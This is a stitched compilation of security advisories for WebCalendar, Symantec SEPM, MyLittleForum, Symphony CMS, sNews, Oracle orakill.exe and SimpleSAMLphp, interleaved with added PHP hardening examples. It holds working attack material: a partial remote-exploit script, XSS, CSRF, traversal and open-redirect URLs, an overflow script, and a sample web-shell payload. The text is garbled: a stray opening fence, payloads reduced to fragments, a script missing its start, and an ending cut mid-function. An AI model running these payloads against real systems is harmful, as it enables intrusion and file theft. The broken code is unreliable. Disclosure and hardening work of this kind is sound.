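// Added example, not WebCalendar's or Nagios NA's code: the fail-open Referer
// check quoted in the advisory above, next to a fail-closed origin comparison
// combined with a per-session synchronizer token. Function names, the site
// URL and the request arrays below are assumptions for illustration.

// Shape of the original check: a missing Referer header is accepted, which is
// exactly what a page that suppresses its referrer relies on.
function referer_check_fail_open(array $server, string $server_url): bool
{
    if (empty($server['HTTP_REFERER'])) {
        return true;
    }
    return (bool) preg_match("@$server_url@i", $server['HTTP_REFERER']);
}

// scheme://host[:port] of a URL, or null when it cannot be parsed.
function origin_of(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        return null;
    }
    $origin = strtolower($p['scheme'] . '://' . $p['host']);
    return isset($p['port']) ? $origin . ':' . $p['port'] : $origin;
}

// Hardened header check: prefer Origin, fall back to Referer, compare the
// whole origin exactly (no substring match) and refuse when neither is sent.
function referer_check_fail_closed(array $server, string $server_url): bool
{
    $expected  = origin_of($server_url);
    $candidate = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($expected === null || $candidate === '') {
        return false;
    }
    return origin_of($candidate) === $expected;
}

// Synchronizer token: created once per session, embedded in every form that
// changes state, and compared in constant time when the form is submitted.
function csrf_token_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_token_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// What a handler such as edit_user_handler.php or admin.php should require
// before acting on a POST: both the header check and the token must pass.
function state_change_allowed(array $server, array $session, array $post, string $server_url): bool
{
    return referer_check_fail_closed($server, $server_url)
        && csrf_token_valid($session, $post);
}

// Constructed requests against an assumed site URL.
$server_url = 'http://calendar.example.test/WebCalendar-1.2.7/';
$session    = [];
$token      = csrf_token_issue($session);

// 1) Forged POST from a page that suppressed its referrer: no headers, no token.
$forged = ['REQUEST_METHOD' => 'POST'];
echo 'original check accepts the referrer-less forgery: ',
     var_export(referer_check_fail_open($forged, $server_url), true), "\n";
echo 'hardened check accepts it: ',
     var_export(state_change_allowed($forged, $session, [], $server_url), true), "\n";

// 2) Legitimate same-site form submission carrying this session's token.
$legit = [
    'REQUEST_METHOD' => 'POST',
    'HTTP_ORIGIN'    => 'http://calendar.example.test',
    'HTTP_REFERER'   => 'http://calendar.example.test/WebCalendar-1.2.7/edit_user.php',
];
echo 'hardened check accepts the legitimate submission: ',
     var_export(state_change_allowed($legit, $session, ['csrf_token' => $token], $server_url), true), "\n";

// 3) Same-site headers but a token that does not belong to this session.
echo 'hardened check accepts a mismatched token: ',
     var_export(state_change_allowed($legit, $session, ['csrf_token' => str_repeat('0', 64)], $server_url), true), "\n";
```

The token check is what actually closes the hole: a browser that omits Referer is legitimate, so a header-only defence has to choose between breaking those clients and failing open.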
WebCalendar v1.2.7 PHP Code Injection
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.k5n.us/webcalendar.php

Product:
========
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required. WebCalendar can be set up in a variety of ways, such as...

- A schedule management system for a single person
- A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user
- An events schedule that anyone can view, allowing visitors to submit new events
- A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution, or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.

Vulnerability Type:
===================
PHP Code Injection

CVE Reference:
==============
N/A

Vulnerability Details:
======================
Since WebCalendar's install script is not removed after installation (there is no "automatic" removal of it), low privileged users can inject arbitrary PHP code through the "Database Cache" directory value, as no input validation exists for it when a user installs the application using the WebCalendar walk-through wizard. If WebCalendar's installation script is available as part of a default image, often as a convenience offered by some hosting providers, this can be used to gain code execution on the target system. The only requirement is that the user must have privileges to authenticate to the MySQL database and to run the install script. So, users who have install wizard access for the WebCalendar application will now have the ability to launch arbitrary system commands on the affected host.

One problem we must overcome is that WebCalendar filters double quotes ("), so we cannot use code containing them. However, we can defeat this obstacle using the all-too-forgotten backtick `CMD` operator! e.g.

*/?>

This results in "settings.php" being injected like...

readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php
*/ ?>

Exploitation step(s):
=====================
1) Login to the WebCalendar Installation Wizard.
2) Proceed to Step 2 of the WebCalendar Installation Wizard install script.
   http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch=2
3) Click the "Test Settings" button to ensure the connection to the database works.
4) Enter the PHP code below as the value of the "Database Cache Directory:" input field to pop calculator for the POC (Windows).
   */?>
5) Click the "Next" button
6) Click the "Next" button
7) Click the "Save settings" button

BOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get the following error when clicking the "Test Settings" button, "Failure Reason: Database Cache Directory does not exist", just click the back button then forward, or just click the "Test settings" button again to try to get past the error.

Disclosure Timeline:
====================
Vendor Notification: No Replies
July 4, 2016 : Public Disclosure

Severity Level:
===============
8.0 (High)
CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
Symantec SEPM v12.1 Multiple Vulnerabilities
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec

Vendor:
=======
www.symantec.com

Product:
========
SEPM Symantec Endpoint Protection Manager and client v12.1

SEPM provides a centrally managed solution. It handles security policy enforcement, host integrity checking (Symantec Network Access Control only), and automated remediation over all clients. The policies functionality is the heart of the Symantec software. Clients connect to the server to get the latest policies, security settings, and software updates.

Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect

CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect

Vulnerability Details:
======================
The management console for SEPM contains a number of security vulnerabilities that could be used by a lower-privileged user or by an unauthorized user to elevate privilege or gain access to unauthorized information on the management server. Exploitation attempts of these vulnerabilities require access to the SEP Management console.

References:
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20160628_01

Exploit code(s):
================
In this case XSS can bypass the "http-only" cookie protection because the SEPM application writes and stores the session ID within various javascript functions used by the application within the DOM, thereby exposing them directly to the XSS attack:

1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm

So all we need to do is alert() any one of these functions, e.g. alert(createModalDialogFromURL), and it will leak the session ID, essentially throwing the HttpOnly secure cookie protection flag into the garbage. e.g.

XSS POC, defeat the http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1=CR=alert%28createModalDialogFromURL%29#

Open Redirect in external URL .php script:
==========================================
A reporting URL used to route generated reports externally to any authorized URL is susceptible to an open redirect vulnerability that could have allowed an authorized but less-privileged user to redirect an unsuspecting privileged user to an external URL to attempt further exploitation, e.g. phishing. If a victim clicks on a link supplied by an attacker, e.g.

https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org

Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgeries exist in a couple of places within this version of SEPM. Below is an example of sending a scheduled report to a remote attacker's email, if the currently logged in user visits a malicious webpage or clicks an infected link etc...

Symantec Reporting Admin CSRF POC:
Form target: https://localhost:8445/Reporting/Reports/sr-save.php (method="POST")
document.getElementById('PWN').submit()

Disclosure Timeline:
====================
Vendor Notification: February 11, 2016
Vendor Acknowledges Report: February 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure

Exploitation Technique:
=======================
Remote

Severity Level(s):
==================
Cross Site Scripting: Medium
  v2 6.8 AV:A/AC:M/Au:S/C:C/I:C/A:N
  v3 6.7 AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Cross Site Request Forgery: High
  v2 7.0 AV:A/AC:M/Au:M/C:C/I:C/A:C
  v3 7.1 AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Open Redirect: Medium
  v2 4.1 AV:A/AC:L/Au:S/C:P/I:P/A:N
  v3 4.1 AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
MyLittleForum v2.3.5 PHP Command Injection

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt
[+] ISR: APPARITIONSEC

Vendor: mylittleforum.net
Download: github.com/ilosuna/mylittleforum/releases/tag/v2.3.5

Product: MyLittleForum 2.3.5
my little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL.

Vulnerability Type: PHP Command Execution
CVE Reference: N/A

Vulnerability Details:
When setting up MyLittleForum, the user walks through an installation script and supplies the application's details: the forum's email address and name, the admin email and password, the database name, etc. The installation script performs no input validation on these values, so a low-privileged user can supply arbitrary PHP code as the Database Name. The value is written verbatim into config/db_settings.php, which the application then parses and executes. Because the supplied Database Name is not valid, MySQL throws an error, but the injected PHP payload has already executed on the host.

If the CMS is installed by a low-privileged user who has only basic MySQL authorization to run the installer, the result is privilege escalation, remote command execution and complete takeover of the host server.

/config/db_settings.php is protected by an .htaccess file, but the payload is written directly into db_settings.php and executed via /install/index.php, bypassing the access control the .htaccess file provides; alternatively the injected payload can simply delete .htaccess by calling @unlink('.htaccess').

Reproduction steps:
1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php
2) For the Database Name input field, enter the PHP code below as a POC.
';?>

Result, the contents of /etc/passwd read back through the injected code:
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
etc...

Exploit code(s):
1) Download and unpack mylittleforum-2.3.5, upload it to a web server (Linux), chmod -R 777, etc.
2) Run the PHP script below from the command line of a remote workstation.
3) BOOM, we can now read the Linux "/etc/passwd" file on the remote server.

,,,\r\n";
echo "= by hyp3rlinx ===\r\n";
exit(); }
$port=80;                  #Default port
$victim=$argv[1];          #IP
$user=$argv[2];            #MySQL username
$pwd=$argv[3];             #MySQL password
$root_dir=$argv[4];        #/mylittleforum-2.3.5
$uri="/install/index.php"; #PHP CMD inject entry point
$s = fsockopen($victim, $port, $errno, $errstr, 10);
if(!$s){echo "Cant connect to the server!"; exit();}
$CMD_INJECTTION="forum_name=PWN".
"_address=http://$victim/$root_dir/;.
"_email=x...@x.com".
"_name=$user".
"_email=x...@x.com".
"_pw=$pwd".
"_pw_conf=$pwd".
"=localhost".
"=';?>

Disclosure Timeline:
Vendor Notification: No Reply
June 27, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: (High) 8.7
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

hyp3rlinx
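The MyLittleForum bug above is a config-file injection: a form value is interpolated into a PHP source file that the application later includes. The following is an added example, not MyLittleForum's own installer code, showing the vulnerable write pattern beside a hardened one; the function names, the $db_settings array layout and the payload string are assumptions for illustration.

```php
<?php
// Added example (not MyLittleForum code). Models the bug class in the advisory:
// an install-form value is written into a PHP config file that is include()d later.
// write_db_settings_* and the $db_settings layout are assumptions for illustration.

// Vulnerable: the installer drops the raw value between single quotes.
// A database name such as  x'; system('id'); $y='  leaves the string literal
// and injects PHP that runs on every include of the config file.
function write_db_settings_vulnerable(string $dbName): string {
    return "<?php\n"
         . "\$db_settings['db_name'] = '" . $dbName . "';\n";
}

// Hardened, two layers:
//  1) structural validation: a MySQL schema name never legitimately contains
//     quotes, semicolons or tags, so anything outside [A-Za-z0-9_$] is refused;
//  2) var_export() emits a correctly escaped PHP literal, so even if the
//     allow-list were loosened later the value could not close the string.
function write_db_settings_hardened(string $dbName): string {
    if ($dbName === '' || strlen($dbName) > 64 || !preg_match('/^[A-Za-z0-9_$]+$/', $dbName)) {
        throw new InvalidArgumentException('database name must match [A-Za-z0-9_$]{1,64}');
    }
    return "<?php\n"
         . "\$db_settings['db_name'] = " . var_export($dbName, true) . ";\n";
}

// Demonstration on a constructed payload of the kind the advisory describes
// (closes the literal, deletes .htaccess, leaves a command shell behind).
$payload = "x'; @unlink('.htaccess'); system(\$_GET['cmd']); \$x='";

echo "--- vulnerable writer, payload lands as live code ---\n";
echo write_db_settings_vulnerable($payload);

echo "--- var_export() alone keeps it inside the string ---\n";
echo var_export($payload, true), "\n";

echo "--- hardened writer ---\n";
try {
    echo write_db_settings_hardened($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo write_db_settings_hardened('forum_db');
```

Run it with `php` on the command line and compare the three outputs: only the first one contains a second PHP statement. The same pattern (never string-concatenate user input into generated source; validate the shape, then serialize with var_export() or json_encode()) applies to any installer that writes settings files.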
Symphony CMS v2.6.7 Session Fixation

[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SYMPHONY-CMS-SESSION-FIXATION.txt
[+] ISR: APPARITIONSEC

Vendor: www.getsymphony.com
Product: Symphony CMS v2.6.7
Download: http://www.getsymphony.com/download/
Symphony is a XSLT-powered open source content management system.

Vulnerability Type: Session Fixation
CVE Reference: CVE-2016-4309

Vulnerability Details:
Symphony CMS is prone to "Session Fixation", allowing attackers to preset a user's PHPSESSID "Session Identifier". If the application is deployed with an insecure PHP.INI where "session.use_only_cookies" is not enabled, attackers can send victims a link to the vulnerable application with the "PHPSESSID" already initialized, because Symphony does not call "session_regenerate_id()" upon successful user authentication.

Note: as per php.net/manual/en/session.configuration.php, "session.use_only_cookies=1" is the default since PHP 5.3.0.

e.g. "http://localhost/symphony/?PHPSESSID=APPARITION666"

As Symphony's Session ID is not regenerated, an arbitrary Session ID can be 'fixated' to a user. If that user authenticates using the attacker-supplied session-fixated link, the attacker can access the affected application from a different computer/browser with the same level of access as the victim. The default cookie lifetime for Symphony CMS is up to two weeks.

Reproduction steps:
Edit PHP.INI and set 'session.use_only_cookies=0' if applicable, as a POC test.

1) Telnet localhost 80
2) Make an HTTP request with a prefixed PHPSESSID:

GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1
Host: localhost
Connection: close

3) Hit enter twice:

HTTP/1.1 200 OK
Date: Mon, 16 May 2016 02:06:47 GMT
Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8
X-Powered-By: PHP/5.6.8
Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; Max-Age=1209600; path=/symphony-2.6.7; httponly
Content-Length: 1501
Connection: close
Content-Type: text/html; charset=UTF-8

Exploit code(s):
1) http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx
2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION

Disclosure Timeline:
Vendor Notification: May 3, 2016
Vendor Release Fix: May 23, 2016
June 20, 2016 : Public Disclosure

Exploitation Method: Remote
Severity Level: 6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] Symphony CMS 2.6.7
Vulnerable Parameter(s): [+] 'PHPSESSID'

hyp3rlinx
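The advisory names two missing controls: the application never calls session_regenerate_id() on login, and the deployment accepts a session id from the query string. The following is an added example, not Symphony's code, of a login handler that applies both; authenticate() is a stand-in with a constructed credential, and the ini settings are the standard PHP session options.

```php
<?php
// Added example, not Symphony CMS code. Shows the controls the advisory says
// Symphony 2.6.7 lacked: regenerating the session identifier at authentication,
// plus the php.ini settings that stop an id supplied in the URL from being
// accepted at all. authenticate() is a stand-in with one constructed user.

function harden_session_config(): void {
    ini_set('session.use_only_cookies', '1'); // ignore ?PHPSESSID=... in the query string
    ini_set('session.use_trans_sid', '0');    // never rewrite links to carry the id
    ini_set('session.use_strict_mode', '1');  // refuse ids the server never issued
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_samesite', 'Lax');
}

function authenticate(string $user, string $password): bool {
    // constructed credential store: one account, password "correct horse battery staple"
    static $users = null;
    if ($users === null) {
        $users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
    }
    return isset($users[$user]) && password_verify($password, $users[$user]);
}

// Returns the post-login session id, or null when the credentials are wrong.
function login(string $user, string $password): ?string {
    if (!authenticate($user, $password)) {
        return null;
    }
    // The privilege level changes here, so whatever id the browser arrived with
    // (possibly attacker-chosen) is discarded and a fresh one issued.
    // true = destroy the old session data so the fixed id cannot be reused.
    if (!session_regenerate_id(true)) {
        throw new RuntimeException('session_regenerate_id failed');
    }
    $_SESSION['user'] = $user;
    $_SESSION['authenticated_at'] = time();
    return session_id();
}

// Demonstration: a browser that arrives carrying the attacker's id from the PoC.
harden_session_config();
session_id('APPARITION666');   // attacker-supplied; strict mode may already replace it
session_start();
$before = session_id();
$after  = login('alice', 'correct horse battery staple');

echo "id before login: $before\n";
echo "id after login:  ", $after ?? '(login failed)', "\n";
echo ($after !== null && $after !== $before) ? "fixation defeated\n" : "FIXATION POSSIBLE\n";
```

With session.use_strict_mode enabled the server would not have echoed PWN3D666 back in the Set-Cookie header of the PoC in the first place, since that id was never created by the session module. Regenerating on login is still required: a victim who already holds a server-issued id that the attacker also knows (shared machine, leaked log) is protected only by the regeneration.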
sNews CMS v1.7.1 Remote Command Execution / CSRF / XSS

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SNEWS-RCE-CSRF-XSS.txt
[+] ISR: APPARITIONSEC

Vendor: snewscms.com
Product: sNews CMS v1.7.1

Vulnerability Type:
Persistent Remote Command Execution
Cross Site Request Forgery (CSRF)
Persistent XSS

CVE Reference: N/A

Vulnerability Details:
If an authenticated user happens to stumble upon an attacker's webpage or click an infected link, they have a chance to get the following prizes:
1) Persistent Remote Code Execution
2) Cross Site Request Forgery
3) Persistent XSS

sNews has a feature that allows PHP functions to be inserted into articles by authenticated users under "Edit Article". However, there is no CSRF token or check to prevent unauthorized HTTP requests from being made on behalf of that user. Furthermore, these commands are stored in the MySQL database in the 'articles' table, so each time that sNews webpage is visited the command executes.

e.g. CSRF / RCE under the "Edit Article" admin area:
[func]system:|:"calc.exe"[/func]

On line 3270 of "snews.php" there is no input filtering, allowing arbitrary system calls:
$returned = call_user_func_array($func[0], explode(',',$func[1]));

CSRF / Hijack sNews CMS accounts: the username must be known in advance; if it is known, that lucky user wins a changed password!

CSRF / arbitrary file deletion: we can delete arbitrary files in the webroot, which we can use to bypass access controls like the ".htaccess" file, allowing attackers to read/access files from those affected directories. On line 3080 of "snews.php" untrusted user input is passed directly to the PHP "unlink" function, which deletes any file the attacker wants:

if (isset($_GET['task']) == 'delete') {
    $file_to_delete = $_GET['folder'].'/'.$_GET['file'];
    @unlink($file_to_delete);
    echo notification(0,'','snews_files');

A persistent XSS entry point also exists in the same "Edit Article" admin area, but why bother when we have the RCE option.

Exploit code(s):

Remote Command Execution, pop "calc.exe" POC:
http://localhost/snews1.7.1/?action=process=admin_article=2;> document.getElementById('CSRF_RCE_PRIZE').submit()
After we make the HTTP request for the booby-trapped article, KABOOM:
http://localhost/snews1.7.1/uncategorized/remote-command-execution/

CSRF - Account Hijack:
http://localhost/snews1.7.1/?action=process=changeup;> document.getElementById('CSRF-CHG-PASSWD-PRIZE').submit()

CSRF - Arbitrary File Deletion:
1) Create a file in htdocs / web root as a test, e.g. "DELETEME.php"
2) Visit the following URL as an authenticated user:
http://localhost/snews1.7.1/?action=snews_files=delete=Patches Log=../../../DELETEME.php
3) File's gone!

Persistent XSS:
http://localhost/snews1.7.1/?action=process=admin_article=2;> document.getElementById('XSS').submit()

Disclosure Timeline:
Vendor Notification: No Replies
June 19, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: Critical
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] snews v1.7.1

by hyp3rlinx
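Two of the quoted sNews lines deserve a hardened counterpart. The [func] handler passes an article-supplied name straight to call_user_func_array(), so the fix is an allow-list of the functions the feature is meant to expose. The deletion branch has an additional logic bug worth noting: isset() returns a bool, and in PHP (true == 'delete') is true, so that branch runs for any task value, not only 'delete'. The following is an added example, not sNews code; the function names, the allow-list contents and the scratch directory are assumptions.

```php
<?php
// Added example, not sNews code. Hardened counterparts to the two snews.php
// fragments quoted in the advisory. render_func_tag, delete_uploaded_file and
// the allow-list contents are assumptions for illustration.

// 1) [func]name:|:arg1,arg2[/func]  The vulnerable line is
//      call_user_func_array($func[0], explode(',', $func[1]));
//    with $func[0] taken from the article body, so any PHP function is callable.
//    Only names present in this allow-list are ever handed to PHP.
const ALLOWED_ARTICLE_FUNCS = [
    'strtoupper' => true,
    'date'       => true,   // e.g. [func]date:|:Y-m-d[/func]
];

function render_func_tag(string $body): string {
    return preg_replace_callback(
        '/\[func\](\w+):\|:(.*?)\[\/func\]/s',
        function (array $m): string {
            if (!isset(ALLOWED_ARTICLE_FUNCS[$m[1]])) {
                return '[func removed]';
            }
            return (string) call_user_func_array($m[1], explode(',', $m[2]));
        },
        $body
    );
}

// 2) ?task=delete&folder=...&file=...  The quoted code compares isset() (a bool)
//    to 'delete', which is always true, then unlinks the raw path. This version
//    checks the task string, refuses separators and '..' in the user-controlled
//    parts, and confirms with realpath() that the target stays under the upload root.
function delete_uploaded_file(string $uploadRoot, string $task, string $folder, string $file): bool {
    if ($task !== 'delete' || $folder === '' || $file === '') {
        return false;
    }
    if (preg_match('#[/\\\\]|\.\.#', $folder . $file)) {
        return false;   // traversal characters in folder or file name
    }
    $root   = realpath($uploadRoot);
    $target = realpath($uploadRoot . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($root === false || $target === false
        || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0 || !is_file($target)) {
        return false;
    }
    return unlink($target);
}

// Demonstration on constructed input.
echo render_func_tag('a [func]system:|:"calc.exe"[/func] b [func]strtoupper:|:ok[/func]'), "\n";

$root = sys_get_temp_dir() . '/snews_demo_' . getmypid();
mkdir("$root/Patches Log", 0700, true);
file_put_contents("$root/Patches Log/keep.txt", 'x');
file_put_contents("$root/DELETEME.php", 'x');
var_dump(delete_uploaded_file($root, 'delete', 'Patches Log', '../DELETEME.php'));
var_dump(delete_uploaded_file($root, 'delete', 'Patches Log', 'keep.txt'));

// tidy up the scratch directory
@unlink("$root/DELETEME.php");
@rmdir("$root/Patches Log");
@rmdir($root);
```

The regex-based rejection and the realpath() containment check are deliberately independent: the first stops the obvious `../` payload from the advisory before any filesystem call, the second catches anything the first misses (symlinks inside the upload tree, unusual encodings) by comparing resolved paths.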
Oracle Orakill.exe Buffer Overflow

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt
[+] ISR: apparitionsec

Vendor: www.oracle.com
Product: orakill.exe v11.2.0
The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle sessions directly from the DOS command line without requiring any connection to the database.

C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h
Usage: orakill sid thread
where sid = the Oracle instance to target
thread = the thread id of the thread to kill
The thread id should be retrieved from the spid column of a query such as:
select spid, osuser, s.program from v$process p, v$session s where p.addr=s.paddr

Vulnerability Type: Buffer Overflow
Reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html

Vulnerability Details:
A ToLower() filter is applied to the supplied arguments, e.g. 'A' \x41 becomes 'a' \x61 (hence EIP = 61616161 in the dump below); it may be possible to subvert this with an encoder technique such as "ALPHA3". A second argument of just 4 bytes must also be supplied to trigger the access violation.

orakill.exe <104 bytes>, <4 bytes>

Register dump:
EAX 4000
ECX 0018FCA8 ASCII ""
EDX
EBX 61616161
ESP 0018FD10 ASCII ""
EBP 61616161
ESI 61616161
EDI 61616161
EIP 61616161
C 0  ES 002B 32bit 0()
P 0  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0..ST7 empty
FST Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

Exploit code(s):
import subprocess
pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "
payload="A"*100 + ""
subprocess.Popen([pgm, payload, " "], shell=False)

Disclosure Timeline:
Vendor Notification: October 5, 2015
Vendor Fix: April 25, 2016
June 13, 2016 : Public Disclosure

Exploitation Technique: Local
Severity Level: Low

hyp3rlinx
SimpleSAMLphp Link Injection

[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SIMPLESAML-PHP-LINK-INJECTION.txt
[+] ISR: apparitionsec

Vendor: simplesamlphp.org
Product: simplesamlphp < 1.14.4

Vulnerability Type: Link Injection
CVE Reference: N/A

Vulnerability Details:
Several scripts that are part of SimpleSAMLphp display a web page with links obtained from the request parameters. This is supposed to enhance usability, as users are presented with links they can follow after completing a certain action, like logging out. The following scripts do not check the URLs obtained via the HTTP request before displaying them as the target of links that the user may click on:

www/logout.php
modules/core/www/no_cookie.php

The issue allowed attackers to display links targeting a malicious website inside a trusted site running SimpleSAMLphp, due to the lack of security checks on the link_href and retryURL HTTP parameters, respectively. The issue was resolved by verifying the URLs received in the request against a white list of websites specified in the trusted.url.domains configuration option.

References: https://simplesamlphp.org/security/201606-01

Affected versions: All SimpleSAMLphp versions prior to 1.14.4.

Impact: A remote attacker could craft a link or pop-up webpage pointing to a trusted website running SimpleSAMLphp, including a parameter pointing to a malicious website, to fool the victim into visiting that website by clicking on a link in the page presented by the "trusted" SimpleSAMLphp application.

Vulnerable Codes:

"no_cookie.php"
...
if (isset($_REQUEST['retryURL'])) {
    $retryURL = (string)$_REQUEST['retryURL'];
    $retryURL = \SimpleSAML\Utils\HTTP::normalizeURL($retryURL);
} else {
    $retryURL = NULL;
}
$globalConfig = SimpleSAML_Configuration::getInstance();
$t = new SimpleSAML_XHTML_Template($globalConfig, 'core:no_cookie.tpl.php');
$t->data['retryURL'] = $retryURL;
$t->show();

"logout.php"
...
if (array_key_exists('link_href', $_REQUEST)) {
    $link = (string) $_REQUEST['link_href'];
    $link = \SimpleSAML\Utils\HTTP::normalizeURL($link);
} else {
    $link = 'index.php';
}
if (array_key_exists('link_text', $_REQUEST)) {
    $text = $_REQUEST['link_text'];
} else {
    $text = '{logout:default_link_text}';
}
$t = new SimpleSAML_XHTML_Template($config, 'logout.php');
$t->data['link'] = $link;
$t->data['text'] = $text;
$t->show();

Note that normalizeURL() only canonicalizes the URL; it performs no check on where the URL points.

Exploit code(s):
1) https://victim-server/simplesaml/module.php/core/no_cookie.php?retryURL=https://attacker-server
2) https://victim-server/simplesaml/logout.php?link_href=http://attacker-server/Evil.php&link_text=PLEASE%20DOWNLOAD%20THIS%20IMPORTANT%20UPDATE

Disclosure Timeline:
Vendor Notification: May 31, 2016
June 9, 2016 : Public Disclosure

Exploitation Technique: Remote
Severity Level: Low

hyp3rlinx
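The fix the advisory describes is an allow-list check of the request-supplied URL against trusted domains before it is rendered as a link target. The following is an added example, not SimpleSAMLphp's own implementation, of such a check; the option name trusted.url.domains comes from the advisory, while the function name, the domain list and the test inputs are assumptions. Besides the two advisory payloads it also covers the usual ways an allow-list check gets bypassed (protocol-relative URLs, credentials in the authority, non-http schemes, backslashes).

```php
<?php
// Added example, not SimpleSAMLphp code. Validates a URL taken from the request
// (retryURL / link_href in the advisory) against an allow-list of domains, the
// approach the advisory says the fix took (trusted.url.domains). is_trusted_url,
// the host list and the sample inputs are constructed for illustration.

function is_trusted_url(string $url, string $selfHost, array $trustedDomains): bool {
    // Browsers treat backslashes as slashes ("\\evil" becomes "//evil"), and CR/LF
    // would allow header/markup injection downstream; reject all of them up front.
    if ($url === '' || strpbrk($url, "\\\r\n") !== false) {
        return false;
    }
    $p = parse_url($url);
    if ($p === false) {
        return false;
    }
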